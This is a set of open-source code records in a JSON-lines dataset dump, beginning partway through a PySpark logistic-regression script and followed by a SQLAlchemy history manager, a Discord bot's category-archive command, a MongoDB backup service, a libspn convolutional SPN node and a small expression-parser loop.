== \"__main__\":\n    # 1. Load the data\n    spark = SparkSession.builder.appName('log_reg').getOrCreate()\n    df = spark.read.csv('./data/Log_Reg_dataset.csv', inferSchema=True, header=True)\n    # print('samples: {}, features: {}'.format(df.count(), len(df.columns)))  # samples: 20000, features: 6\n\n    # 2. Data analysis\n    # analyse_data(df)\n\n    # 3. Feature engineering\n    model_df = feature_process(df)\n    # print(model_df.show(3))\n    # split the dataset\n    training_df, test_df = model_df.randomSplit([0.75, 0.25])\n    print('Training set size:', training_df.count())\n    print('Test set size:', test_df.count())\n\n    print('Class balance of the training set:')\n    print(training_df.groupBy('Status').count().show())\n\n    print('Class balance of the test set:')\n    print(test_df.groupBy('Status').count().show())\n\n    # 4. Train the model\n    log_reg = LogisticRegression(labelCol='Status').fit(training_df)\n\n    # 5. Evaluate the model\n    train_results = log_reg.evaluate(training_df).predictions\n    correct_preds = train_results.filter(train_results['Status'] == 1).filter(train_results['prediction'] == 1).count()\n    print('Training accuracy:', float(correct_preds)/(training_df.filter(training_df['Status'] == 1).count()))\n\n    # performance on the test set\n    results = log_reg.evaluate(test_df).predictions\n    # compute the confusion matrix\n    true_postives = results[(results.Status == 1) & (results.prediction == 1)].count()\n    true_negatives = results[(results.Status == 0) & (results.prediction == 0)].count()\n    false_positives = results[(results.Status == 0) & (results.prediction == 1)].count()\n    false_negatives = results[(results.Status == 1) & (results.prediction == 0)].count()\n    recall = float(true_postives)/(true_postives + false_negatives)\n    print('Recall:', recall)\n\n    precision = float(true_postives) / (true_postives + false_positives)\n    print('Precision:', precision)\n\n    accuracy = float((true_postives+true_negatives) /(results.count()))\n    print('Accuracy:', accuracy)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shawroad/Python-Library-Learning","sub_path":"PySpark/003-logistic_regression_use_pyspark.py","file_name":"003-logistic_regression_use_pyspark.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"38"}
+{"seq_id":"20258966645","text":"from typing import Any, Dict, List, Optional, Union\n\nfrom sqlalchemy import select\nfrom sqlalchemy.orm import selectinload\n\nfrom labfunctions.models import HistoryModel\nfrom labfunctions.types import (\n    ExecutionResult,\n    HistoryLastResponse,\n    HistoryResult,\n    NBTask,\n)\n\n\ndef select_history():\n\n    stmt = select(HistoryModel).options(selectinload(HistoryModel.project))\n    return stmt\n\n\nasync def get_last(\n    session, projectid: str, wfid: Optional[str] = None, limit=1\n) -> Union[HistoryLastResponse, None]:\n    if wfid:\n        stmt = (\n            select(HistoryModel)\n            .where(HistoryModel.wfid == wfid)\n            .where(HistoryModel.project_id == projectid)\n            .order_by(HistoryModel.created_at.desc())\n            .limit(limit)\n        )\n    else:\n        stmt = (\n            select(HistoryModel)\n            .where(HistoryModel.project_id == projectid)\n            .order_by(HistoryModel.created_at.desc())\n            .limit(limit)\n        )\n\n    r = await session.execute(stmt)\n    results = r.scalars()\n    if not results:\n        return None\n\n    rsp = []\n    for r in results:\n        rsp.append(\n            HistoryResult(\n                wfid=r.wfid,\n                execid=r.execid,\n                status=r.status,\n                result=r.result,\n                created_at=r.created_at.isoformat(),\n            )\n        )\n    return HistoryLastResponse(rows=rsp)\n\n\nasync def get_one(session, execid: str) -> Union[HistoryResult, None]:\n    stmt = select(HistoryModel).where(HistoryModel.execid == execid).limit(1)\n    r = await 
session.execute(stmt)\n model: Union[HistoryModel, None] = r.scalar_one_or_none()\n hr = None\n if model:\n hr = HistoryResult(\n wfid=model.wfid,\n execid=model.execid,\n status=model.status,\n result=model.result,\n created_at=model.created_at.isoformat(),\n )\n return hr\n\n\nasync def create(session, execution_result: ExecutionResult) -> HistoryModel:\n result_data = execution_result.dict()\n\n status = 0\n if execution_result.error:\n status = -1\n\n row = HistoryModel(\n wfid=execution_result.wfid,\n execid=execution_result.execid,\n project_id=execution_result.projectid,\n elapsed_secs=execution_result.elapsed_secs,\n nb_name=execution_result.name,\n result=result_data,\n status=status,\n )\n session.add(row)\n return row\n","repo_name":"nuxion/labfunctions","sub_path":"labfunctions/managers/history_mg.py","file_name":"history_mg.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"25762957","text":"\"\"\"Contains cog classes for any archival interactions.\"\"\"\n\nimport logging\nimport re\n\nimport discord\n\nfrom exceptions import BaseDoesNotExistError, UserNotInCSSDiscordServer\nfrom utils import (\n CommandChecks,\n TeXBotApplicationContext,\n TeXBotAutocompleteContext,\n TeXBotBaseCog,\n)\n\n\nclass ArchiveCommandCog(TeXBotBaseCog):\n \"\"\"Cog class that defines the \"/archive\" command and its call-back method.\"\"\"\n\n @staticmethod\n async def autocomplete_get_categories(ctx: TeXBotAutocompleteContext) -> set[discord.OptionChoice]: # noqa: E501\n \"\"\"\n Autocomplete callable that generates the set of available selectable categories.\n\n The list of available selectable categories is unique to each member, and is used in\n any of the \"archive\" slash-command options that have a category input-type.\n \"\"\"\n if not ctx.interaction.user:\n return set()\n\n try:\n css_guild: discord.Guild = ctx.bot.css_guild\n interaction_user: discord.Member = await ctx.bot.get_css_user(ctx.interaction.user)\n assert await ctx.bot.check_user_has_committee_role(interaction_user)\n except (AssertionError, BaseDoesNotExistError, UserNotInCSSDiscordServer):\n return set()\n\n return {\n discord.OptionChoice(name=category.name, value=str(category.id))\n for category\n in css_guild.categories\n if category.permissions_for(interaction_user).is_superset(\n discord.Permissions(send_messages=True, view_channel=True)\n )\n }\n\n @discord.slash_command( # type: ignore[no-untyped-call, misc]\n name=\"archive\",\n description=\"Archives the selected category.\"\n )\n @discord.option( # type: ignore[no-untyped-call, misc]\n name=\"category\",\n description=\"The category to archive.\",\n input_type=str,\n autocomplete=discord.utils.basic_autocomplete(autocomplete_get_categories), # type: ignore[arg-type]\n required=True,\n parameter_name=\"str_category_id\"\n )\n @CommandChecks.check_interaction_user_has_committee_role\n @CommandChecks.check_interaction_user_in_css_guild\n async def archive(self, ctx: TeXBotApplicationContext, str_category_id: str) -> None:\n \"\"\"\n Definition & callback response of the \"archive\" command.\n\n The \"archive\" command hides a given category from view of casual members unless they\n have the \"Archivist\" role.\n \"\"\"\n # NOTE: Shortcut accessors are placed at the top of the function, so that the exceptions they raise are displayed before any further errors may be sent\n css_guild: discord.Guild = self.bot.css_guild\n interaction_member: discord.Member = await 
self.bot.get_css_user(ctx.user)\n committee_role: discord.Role = await self.bot.committee_role\n guest_role: discord.Role = await self.bot.guest_role\n member_role: discord.Role = await self.bot.member_role\n archivist_role: discord.Role = await self.bot.archivist_role\n everyone_role: discord.Role = await self.bot.get_everyone_role()\n\n if not re.match(r\"\\A\\d{17,20}\\Z\", str_category_id):\n await self.send_error(\n ctx,\n message=f\"{str_category_id!r} is not a valid category ID.\"\n )\n return\n\n category_id: int = int(str_category_id)\n\n category: discord.CategoryChannel | None = discord.utils.get(\n css_guild.categories,\n id=category_id\n )\n if not category:\n await self.send_error(\n ctx,\n message=f\"Category with ID {str(category_id)!r} does not exist.\"\n )\n return\n\n if \"archive\" in category.name:\n await ctx.respond(\n (\n \":information_source: No changes made. \"\n \"Category has already been archived. :information_source:\"\n ),\n ephemeral=True\n )\n return\n\n # noinspection PyUnreachableCode\n channel: (\n discord.VoiceChannel\n | discord.StageChannel\n | discord.TextChannel\n | discord.ForumChannel\n | discord.CategoryChannel\n )\n for channel in category.channels:\n try:\n channel_needs_committee_archiving: bool = (\n channel.permissions_for(committee_role).is_superset(\n discord.Permissions(view_channel=True)\n ) and not channel.permissions_for(guest_role).is_superset(\n discord.Permissions(view_channel=True)\n )\n )\n channel_needs_normal_archiving: bool = channel.permissions_for(\n guest_role\n ).is_superset(\n discord.Permissions(view_channel=True)\n )\n if channel_needs_committee_archiving:\n await channel.set_permissions(\n everyone_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=False\n )\n await channel.set_permissions(\n guest_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n member_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n committee_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n\n elif channel_needs_normal_archiving:\n await channel.set_permissions(\n everyone_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=False\n )\n await channel.set_permissions(\n guest_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n member_role,\n overwrite=None,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\"\n )\n await channel.set_permissions(\n committee_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=False\n )\n await channel.set_permissions(\n archivist_role,\n reason=f\"{interaction_member.display_name} used \\\"/archive\\\".\",\n view_channel=True\n )\n\n else:\n await self.send_error(\n ctx,\n message=f\"Channel {channel.mention} had invalid permissions\"\n )\n logging.error(\n \"Channel %s had invalid permissions, so could not be archived.\",\n channel.name\n )\n return\n\n except discord.Forbidden:\n await self.send_error(\n ctx,\n message=(\n \"Bot does not have access to the channels in the selected category.\"\n )\n )\n logging.error(\n (\n \"Bot did not have access to the channels in the selected category: \"\n \"%s.\"\n ),\n category.name\n )\n return\n\n await ctx.respond(\"Category successfully 
archived\", ephemeral=True)\n","repo_name":"CSSUoB/TeX-Bot-Py-V2","sub_path":"cogs/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":8276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"43302735820","text":"\"\"\"Service for performing backups and restores.\"\"\"\nimport logging\nfrom pathlib import Path\nfrom typing import ClassVar, Iterable, cast\n\nimport aiofiles\nimport bson\nfrom motor.motor_asyncio import AsyncIOMotorClient\n\nfrom poptimizer.core import consts, domain\n\n\nclass Service:\n    \"\"\"Service for performing backups and restores.\"\"\"\n\n    _dump: ClassVar = consts.ROOT_PATH / \"dump\"\n\n    def __init__(self, mongo_client: AsyncIOMotorClient) -> None:\n        self._logger = logging.getLogger(\"Backup\")\n        self._mongo = mongo_client\n\n    async def backup(self, groups: Iterable[domain.Group]) -> None:\n        \"\"\"Makes a backup copy of a group of objects.\"\"\"\n        for group in groups:\n            await self._backup(group)\n            self._logger.info(f\"backup of {group} completed\")\n\n    async def restore(self, groups: Iterable[domain.Group]) -> None:\n        \"\"\"Restores a backup of a group of objects when the data is absent from MongoDB.\"\"\"\n        for group in groups:\n            if await self._mongo[group.module][group.group].count_documents({}):\n                continue\n\n            await self._restore(group)\n            self._logger.info(f\"initial {group} created\")\n\n    def _backup_path(self, group: domain.Group) -> Path:\n        path = self._dump / group.module / f\"{group.group}.bson\"\n\n        return cast(Path, path)\n\n    async def _backup(self, group: domain.Group) -> None:\n        path = self._backup_path(group)\n        path.parent.mkdir(parents=True, exist_ok=True)\n\n        async with aiofiles.open(path, \"bw\") as backup_file:\n            async for batch in self._mongo[group.module][group.group].find_raw_batches():\n                await backup_file.write(batch)\n\n    async def _restore(self, group: domain.Group) -> None:\n        path = self._backup_path(group)\n        if not path.exists():\n            self._logger.warning(f\"backup file for {group} doesn't exist\")\n\n            return\n\n        async with aiofiles.open(path, \"br\") as backup_file:\n            raw = await backup_file.read()\n\n        collection = self._mongo[group.module][group.group]\n\n        await collection.insert_many(bson.decode_all(raw))\n","repo_name":"WLM1ke/poptimizer","sub_path":"poptimizer/core/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"38"}
+{"seq_id":"37518638797","text":"from libspn.inference.type import InferenceType\nimport libspn.utils as utils\nimport tensorflow as tf\nfrom libspn.exceptions import StructureError\nfrom libspn.log import get_logger\nfrom libspn.graph.op.conv_products import ConvProducts\n\n\n@utils.register_serializable\nclass ConvProductsDepthwise(ConvProducts):\n    \"\"\"A container representing convolutional products in an SPN.\n\n    Args:\n        *values (input_like): Inputs providing input values to this container.\n            See :meth:`~libspn.Input.as_input` for possible values.\n        num_channels (int): Number of channels modeled by this node. This parameter is optional.\n            If ``None``, the layer will attempt to generate all possible permutations of channels\n            under a patch as long as it is under ``num_channels_max``.\n        padding (str): Type of padding used. Can be either 'full', 'valid' or 'wicker_top'.\n            For building Wicker CSPNs, 'full' padding is necessary in all but the very last\n            ConvProducts node. 
The last ConvProducts node should take the 'wicker_top' padding algorithm\n dilation_rate (int or tuple of ints): Dilation rate of the convolution.\n strides (int or tuple of ints): Strides used for the convolution.\n spatial_dim_sizes (list or tuple of ints): Dim sizes of spatial dimensions (height and width)\n num_channels_max (int): The maximum number of channels when automatically generating\n permutations.\n name (str): Name of the container.\n\n Attributes:\n inference_type(InferenceType): Flag indicating the preferred inference\n type for this container that will be used\n during value calculation and learning.\n Can be changed at any time and will be\n used during the next inference/learning\n op generation.\n \"\"\"\n\n logger = get_logger()\n\n def __init__(self, *values, padding='valid', dilation_rate=1,\n strides=2, kernel_size=2, inference_type=InferenceType.MARGINAL,\n name=\"ConvProductsDepthwise\", spatial_dim_sizes=None):\n super().__init__(\n *values, inference_type=inference_type, name=name, spatial_dim_sizes=spatial_dim_sizes,\n strides=strides, kernel_size=kernel_size, padding=padding, dilation_rate=dilation_rate)\n self._num_channels = self._num_input_channels()\n\n @utils.lru_cache\n def _compute_log_value(self, *input_tensors):\n # Concatenate along channel axis\n concat_inp = self._prepare_convolutional_processing(*input_tensors)\n\n # This the quickest workaround for TensorFlow's apparent optimization whenever\n # part of the kernel computation involves a -inf:\n concat_inp = tf.where(\n tf.is_inf(concat_inp), tf.fill(tf.shape(concat_inp), value=-1e20), concat_inp)\n # Convolve\n conv_out = tf.nn.conv2d(\n input=self._channels_to_batch(concat_inp),\n filter=tf.ones(self._kernel_size + [1, 1]),\n padding='VALID',\n strides=[1] + self._strides + [1],\n dilations=[1] + self._dilation_rate + [1],\n data_format='NHWC'\n )\n conv_out = self._batch_to_channels(conv_out)\n return self._flatten(conv_out)\n\n @utils.lru_cache\n def _channels_to_batch(self, t):\n gd = t.shape.as_list()[1:3]\n return tf.reshape(self._transpose_channel_last_to_first(t), [-1] + gd + [1])\n\n @utils.lru_cache\n def _batch_to_channels(self, t):\n gd = t.shape.as_list()[1:3]\n return self._transpose_channel_first_to_last(tf.reshape(t, [-1, self._num_channels] + gd))\n\n def _compute_mpe_path_common(self, counts, *input_values):\n if not self._values:\n raise StructureError(\"{} is missing input values.\".format(self))\n # Concatenate inputs along channel axis, should already be done during forward pass\n inp_concat = self._prepare_convolutional_processing(*input_values)\n spatial_counts = tf.reshape(counts, (-1,) + self.output_shape_spatial)\n\n inp_concat = self._channels_to_batch(inp_concat)\n spatial_counts = self._channels_to_batch(spatial_counts)\n\n input_counts = tf.nn.conv2d_backprop_input(\n input_sizes=tf.shape(inp_concat),\n filter=tf.ones(self._kernel_size + [1, 1]),\n out_backprop=spatial_counts,\n strides=[1] + self._strides + [1],\n padding='VALID',\n dilations=[1] + self._dilation_rate + [1],\n data_format=\"NHWC\")\n\n input_counts = self._batch_to_channels(input_counts)\n\n # In case we have explicitly padded the tensor before forward convolution, we should\n # slice the counts now\n pad_left, pad_right, pad_top, pad_bottom = self.pad_sizes()\n if not any([pad_left, pad_right, pad_top, pad_bottom]):\n return self._split_to_children(input_counts)\n return self._split_to_children(input_counts[:, pad_top:-pad_bottom, pad_left:-pad_right, 
:])\n\n","repo_name":"pronobis/libspn","sub_path":"libspn/graph/op/conv_products_depthwise.py","file_name":"conv_products_depthwise.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"38"} +{"seq_id":"73452135152","text":"from myparser import MyParser\n\nif __name__ == \"__main__\":\n parser = MyParser()\n while True:\n # getting input and parse while 'ctrl+d' pressed\n try:\n s = input('Input Exp >>>> ')\n except EOFError:\n break\n if not s:\n continue\n result = parser.parse(s)\n print(f\"Result Is -> { {result} }\\n\")\n","repo_name":"Hame-daani/Compiler-project","sub_path":"code/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}